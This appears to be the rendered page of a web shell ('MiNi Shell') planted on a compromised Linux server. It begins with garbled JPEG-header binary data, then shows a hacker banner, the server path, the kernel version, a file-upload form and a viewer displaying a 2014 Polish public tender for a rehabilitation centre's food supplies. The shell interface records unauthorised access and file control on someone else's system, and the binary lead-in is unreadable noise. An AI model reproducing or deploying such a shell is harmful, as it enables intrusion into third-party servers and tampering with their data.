JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140306/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140306/74322-N-2014.html

<p class="kh_header"><b>Iwonicz Zdrój: Dostawa w ciągu jednego roku artykułów spożywczych w następujących asortymentach : 

Asortyment I    :   Produkty sypkie i przyprawy
Asortyment II  :   Przetwory owocowe i warzywne 
Asortyment III :   Mięso i wędliny
Asortyment IV :   Mleko i produkty nabiałowe</b><br>
<b>Numer ogłoszenia: 74322 - 2014; data zamieszczenia: 06.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego , ul. Ks. Jana Rąba 22, 38-440 Iwonicz Zdrój, woj. podkarpackie, tel. 013 4350612, faks 013 4350612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> crriwonicz.sanatoria.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa w ciągu jednego roku artykułów spożywczych w następujących asortymentach : 

Asortyment I    :   Produkty sypkie i przyprawy
Asortyment II  :   Przetwory owocowe i warzywne 
Asortyment III :   Mięso i wędliny
Asortyment IV :   Mleko i produkty nabiałowe.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  dostawa w ciągu jednego roku artykułów spożywczych w następujących asortymentach : 
Asortyment I    :   Produkty sypkie i przyprawy
Asortyment II  :   Przetwory owocowe i warzywne 
Asortyment III :   Mięso i wędliny
Asortyment IV :   Mleko i produkty nabiałowe

Szczegółowy opis  przedmiotu zamówienia - zawarty  w formie Zapotrzebowania ilościowego / Formularza cenowego - stanowiącego załączniki do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.87.00.00-7, 15.84.23.10-8, 15.33.21.00-5, 15.33.22.00-6, 15.10.00.00-9, 15.50.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy - załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy - załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy, że  samochód, którym będzie dostarczał przedmiot zamówienia  odpowiada wymaganiom sanitarnym, określonym ustawą z dnia 25.08.2006r. o bezpieczeństwie żywności i żywienia (Dz.U.2010.136.poz.914 ze zm.)  w związku z rozporządzeniem nr 852/2004 Parlamentu Europejskiego  i Rady UE z nia 29.04.2004r. (ogólne wymogi higieny dla wszystkich przedsiębiorstw sektora spożywczego).- załącznik nr 6 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy - załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy - załącznik nr 4 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz oferty  
2)	parafowany przez Wykonawcę projekt umowy 
3)	wypełniony i podpisany formularz cenowy   
4)	podpisane Warunki współpracy 
5)	oświadczenie/ środki transportu,
6)	oświadczenie  o podwykonawcach.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach : 
1.	wystąpienia okoliczności skutkujących  koniecznością zmiany terminu realizacji zamówienia,
2.	wystąpienia zmiany przepisów prawa w zakresie realizacji przedmiotu zamówienia i konieczności dostosowania do nich zapisów umowy,
3.	w przypadku zmiany stawek podatku od towaru i usług VAT, skutkujących koniecznością  zmian y wynagrodzenia,
4.	wystąpienia okoliczności, których nie można było przewidzieć na etapie sporządzania SIWZ i podpisywania umowy, a które są niezbędne do prawidłowej realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> crriwonicz.sanatoria.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Rehabilitacji Rolników KRUS , 38-440 Iwonicz-Zdrój, ul. ks. Jana Rąba 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2014 godzina 09:00, miejsce: Centrum Rehabilitacji Rolników KRUS , 38-440 Iwonicz-Zdrój, ul. ks. Jana Rąba 22 pokój 112.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa produktów sypkich i przypraw w ciągu jednego roku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych w asortymencie : Produkty sypkie, słodycze  i przyprawy w nastepujacych opakowania i ilościach :
1.Cukier paczkowany  (1kg) 				2.800 kg	
2.Cukier puder (0,5 kg)				50 kg	
3.Makaron  (0,5kg) (Lubella, Babuni, Eko lub równoważne):	
	spagetti  				150 kg	
	łazanki  				150 kg	
	zacierka lub tarte ciasto		100 kg	
	Kolanko z falbanką		60 kg	
	kokardki				  60 kg	
	muszelki 				60 kg	
	nitki 				 110 kg	
	rurki				 80 kg	
	świderki				80 kg	
4.	Kasza manna (0,50 kg- 1 kg)		130 kg	
5. 	Kasza jęczmienna (0,50 kg- 1kg)		150 kg	
6.	Kasza gryczana 0,5-1kg 				115 kg	
7.	Mąka pszenna (1 kg)				2.400 kg	
8.	Płatki owsiane (0,50 -1 kg)				100 kg	
9.	Płatki śniadaniowe (250 g) ( Nestle, Lubella lub równoważne) :	
	miodowe				70 szt	
	kukurydziano -miodowe		70 szt	
	cynamonowe			70 szt	
	kulki czekoladowe			70 szt	
	z owocami				 60 szt	
	kukurydziane 			100 szt	
10.	Ryż (0,5-1 kg)				670 kg	
11.	Mąka ziemniaczana 0,5-1 kg				 105 kg	
12.	Kasza kukurydziana 0,5 - 1kg				 45 kg	
13.	Batony czekoladowe /40- 60g / typu lub równoważne :	
	Mars 				 300 szt	
	3 Bit				300 szt	
	Bajeczny 			300 szt	
	Lion 				300 szt	
	Marcepan 			280 szt	
	Musli 				200 szt	
	Pierrot			200 szt	
	Snikers 			200 szt	
	Pawełek  			200 szt	
	Ikar 				200 szt	
14.	Wafelki w czekoladzie (37-50g)typu  lub równoważne :		
	Princessa				450 szt	
	Knopers				450 szt	
	Grześki				 450 szt	
	Góralki 				450 szt	
	Prince Polo				 500 szt	
15	Czekolada 100g :	
	mleczna 				165szt	
	nadziewana				165szt	
16	Paluszki  słone (70-85g)		3.100 szt	
17	Ocet  (0,5l)				 50 szt	
18	Musztarda ok. 200 g	
	Stołowa				250 szt	
	Delikatesowa 			200 szt  	
19	Sos sałatkowy (9g)			380 szt	
20	Przyprawa do zup w płynie (1L) (Winiary, Knorr, Maggi lub równoważne)				360 szt	
21	Pieprz mielony (15 g)naturalny	800 szt	
22	Sól (1kg)				850 kg	
23	Ziele angielskie (15g)			280 szt 	
24	Cynamon (20 g)				 60 szt.	
25	Kminek   (30 g)				 610 szt.	
26	Przyprawa warzywna w proszku (ok.80 g) (Kucharek, Vegeta, Jarzynka lub równoważne)				220 szt.	
27	Bulion drobiowy (2.20kg -3kg) (Knorr, Winiary lub równoważne)				 110 kg	
28	Majeranek (7g) 				220 szt	
29	Żelatyna (50g)				 200 szt	
30	Liście laurowe (7g)				230 szt	
31	Kwasek cytrynowy (25g)			100 szt	
32	Przyprawa do drobiu  (20g) 			340 szt	
33	Przyprawa do  ryb (20g)				120 szt	
34	Herbata (100g)  ( Lipton lub równowazna )	
	granulowana 			70 kg	
	liściasta 				25 kg	
35	Kakao extra mocne (200 g)			100 szt	
36	Kawa zbożowa rozpuszczalna (150g)	150 szt	
37	Kawa zbożowa (500g)				70 kg	
38	Cukier waniliowy (32g)				1.500szt	
39	Galaretka owocowa różne smaki (100g)	50 szt	
40	Budyń (40gróżne smaki)				70 szt.	
41	Kisiel (40gróżne smaki)				70 szt.	
42	Sos pieczeniowy (30 g)				330 szt.	
43	Krem czekoladowy jednoporcjowy 		1.050 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.83.00.00-5, 15.84.23.10-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa w ciągu 1 roku przetworów owocowych i warzywnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spozywczych w asortymencie:przetwory owocowe i warzywne w następujących ilościach : 
 1.	Dżem wysokosłodzony  (od 280g-340g/)	
	truskawkowy				1.300 szt		
	brzoskwiniowy				250 szt.		
	morelowy				250 szt.		
	wiśniowy				250 szt.		
	z czarnej porzeczki			250 szt.		
	ananasowy				250 szt.		
	pomarańczowy				250 szt.		
2.	Kompot : (0,9kg)	
	wiśniowy				2.000 szt		
	Z czarnej porzeczki				800 szt		
	aroniowy				800 szt		
	truskawkowy				280 szt		
3	Marmolada wieloowocowa twarda:	
	(ok.1kg)				70 szt 		
	(ok. 0,32kg)			30 szt		
4.	Koncentrat pomidorowy (30%)  (Pudliszki, Wojna, Złoty bażant lub równoważne)	
	(ok.0,90kg)				260 szt		
	(ok.0,40kg)				200 szt		
5.	Chrzan tarty na kwasku cytrynowym (ok.290g) zawartość chrzanu od 80%				580 szt.		
6.	Fasolka czerwona konserwowa (0,40kg)				250 szt.		
7.	Ogórki konserwowe (0,9l) 				640 szt.		
8	Papryka konserwowa (0,9kg) 				830 szt.		
9.	Kukurydza konserwowa (0,4kg)  				1.150 szt.		
10.	Pieczarki konserwowe  (0,9kg) 				130 szt.		
11.	Groszek konserwowy (1kg) 				600 szt.		
12.	Buraczki konserwowe (całe) (540 ml)				460 szt.		
13	Woda  mineralna niegazowana  (0,50 l)	
	naturalna				4.800 szt		
	smakowa				1.000 szt		
14	Seler konserwowy (słoik 1l)				120 szt.		
15	Seler konserwowy (słoik 0,35kg)				60 szt.		
16	Brzoskwinia w syropie (850g)				20 szt.		
17	Ananas w syropie (580g)				140 szt.		
18	Ketchup (450g)(Pudliszki, Łowicz, Kotlin lub równoważny)	
	łagodny				200 szt		
	pikantny				70 szt		
19	Miód naturalny krajowy lipowy, wielokwiatowy(1,30kg)		75szt.		
20	Patisony konserwowe (0,90kg)				480 szt.		
21	Majonez  :(Kielecki, Hellmans, Winiary lub równoważny)	
	(ok.0,28kg)				1.000 szt		
	(ok.0,9kg)				210 szt		
22	Koncentrat buraczany (330ml)				  30 szt.		
23	Soczki w kartonie (200ml) :	
	wieloowocowy				300 szt		
	jabłkowy				300 szt		
	pomarańczowy				300 szt		
	multiwitamina				300 szt		
24	Napój w kartonie (200ml)  	
	wieloowocowy				150 szt		
	jabłkowy				150 szt.		
	pomarańczowy				150 szt		
	multiwitamina				100 szt		
25	Syropy owocowe (ok.500ml) (Owocowa spiżarnia, Paola, Herbapol lub równoważne)				300 szt.		
26	Sok warzywno-owocowy (ok.300 ml)  (Kubuś, Pysio lub równoważne)				695 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.20.00-4, 15.33.22.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa w ciągu 1 roku mięsa, wędlin i drobiu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych w asortymencie : mięso, wędliny i drób w następujących ilościach : 
1.	Salceson drobiowy			60 kg				
2.	Salceson wiejski			90 kg				
3.	Pasztet drobiowy pieczony			140 kg				
4.	Pasztetowa drobiowa			20 kg				
5.	Pasztetowa wieprzowa			20 kg				
6.	Kaszanka wiejska			320 kg				
7.	Kiełbasa drobiowa podsuszana			150 kg				
8.	Kiełbasa głogowska			20 kg				
9.	Kiełbasa swojska			60 kg				
10.	Kiełbasa podwawelska			20 kg				
11.	Kiełbasa szynkowa			25 kg				
12.	Kiełbasa zwyczajna			230 kg				
13.	Kiełbasa krakowska sucha			70 kg				
14.	Kiełbasa krakowska parzona			60 kg				
15.	Kiełbasa toruńska			550 kg				
16.	Kiełbaski drobiowe coctailowe			230 kg				
17.	Parówka drobiowa			620 kg				
18.	Parówka firmowa			40 kg				
19.	Parówka gruba			40 kg				
20.	Parówki serdelki			280 kg				
21.	Polędwica drobiowa			110 kg				
22.	Polędwica sopocka			70 kg				
23.	Schab pieczony z przyprawami			100 kg				
24.	Baleron wieprzowy			110 kg				
25.	Baleron drobiowy			80 kg				
26.	Bekon			100 kg				
27.	Szynka z drobiu			80 kg				
28.	Szynka biała			40 kg				
29.	Szynka konserwowa			100 kg				
30.	Szynka wieprzowa gotowana			470 kg				
31.	Szynka domowa			100 kg				
32.	Szynka wiejska			60 kg				
33.	Szynka ogonówka			140 kg				
34.	Szynka tradycyjna			90 kg				
35.	Szynka tyrolska			70 kg				
36.	Kabanosy drobiowe			110 kg				
37.	Kabanosy wieprzowe			10 kg				
38.	Filet królewski z indyka			100 kg     				
39.	Filet drobiowy w galarecie			50 kg     			
40.	Boczek faszerowany			60 kg			
41.	Boczek wędzony b/kości			60 kg			
42.	Boczek gotowany b/kości			270 kg			
43.	Mortadela drobiowa			90 kg			
44.	Pieczeń chlebowa			90 kg			
45.	Pieczeń szynkowa			20 kg			
46.	Pieczeń wiedeńska			20 kg			
47.	Lencz			120 kg			
48.	Smaczek konserwowy			80 kg			
49.	Gulasz angielski blok			30 kg			
50.	Baton drobiowy			90 kg			
51.	Wątroba drobiowa			40 kg			
52.	Wątroba wieprzowa			260 kg			
53.	Łopatka wieprzowa b/kości			720 kg			
54.	Karkówka wieprzowa bez kości			1.250 kg			
55.	Schab bez kości			570 kg			
56.	Żeberka wieprz. paski			290 kg			
57.	Wołowe b/kości udziec			650 kg			
58.	Filet drobiowy			1.140 kg			
59.	Udko kurczaka			1.800 kg			
60.	Udziec drobiowy			30 kg			
61.	Kości pokrzepowe			750 kg			
62.	Porcje rosołowe			850 kg			
63.	Słonina			130 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.10.00-5, 15.11.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa w ciągu 1 roku mleka i produktów nabiałowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych w asortymencie : mleko i produkty nabiałowe w następujących ilościach : 
1	Ser topiony (25g) :	
	Śmietankowy			2.600 szt 		
	z szynką  				2.600 szt		
	mix 				2.600 szt		
2	Twaróg pakowany próżniowo w folię (od 0,2kg do 0,6kg) półtłusty 				1.740 kg		
3	Serek  (100g -150g)		
	ziarnisty				 1.300 szt		
	naturalny				1.300 szt		
	owocowy dla dzieci (50g) (Danonki lub równoważne)		340szt		
4	Ser topiony (plastry) paczka 0,15kg (różne smaki)		1.640szt.		
5	Ser żółty (półtłusty) 		
	salami 				200 kg		
	gouda 				200 kg		
	edamski 				200 kg		
	rolada ustrzycka				200 kg		
6	Mleko 2%  (0,9l) 				12.300 szt.		
7	 śmietana 18% kubek (330-400g)				1.750 szt		
8	 Śnieżka w aerozolu				10 szt		
9	Masło  82% tłuszczu (0,2 kg)				1.840 kg		
10	Jogurt (125-150g ) (Jogobella, Danon, Zott, Bakoma  lub równoważny) 	
	naturalny				100 szt		
	bez cukru				 60 szt		
	z ziarnami zbóż 				1.700 szt		
	Owocowe różne smaki  				1.700 szt		
	do picia				 1.700 szt		
	z syropem  				1.700 szt		
	z dodatkami: owoce, czekolada, płatki, kulki			1.700 szt		
11	Tłuszcz roślinny do smażenia (utwardzony)(200g)			150kg		
12	Margaryna (250 g)				350 kg		
13	Ser typu fromage (80-100g)				1.590 szt.		
14	Kefir (400)				360 szt.		
15	Maślanka  (masa netto 1kg )				10 szt.		
16	Olej  (1l) :		
	Uniwersalny				185 szt		
	Rzepakowy				185 szt		
17	Smalec /200g 				410 kg		
18	Napój mleczny z bakteriami L.Casei(Actimel lub równoważny)				910 szt.		
19	Deser mleczny czekoladowy (100g) (Monte deser lub równoważny)				295 szt.		
20	Deser mleczny  czekoladowy (55g)(Monte deser lub równoważny)				295 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.54.21.00-0, 15.55.13.00-8, 15.41.22.00-1, 15.53.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com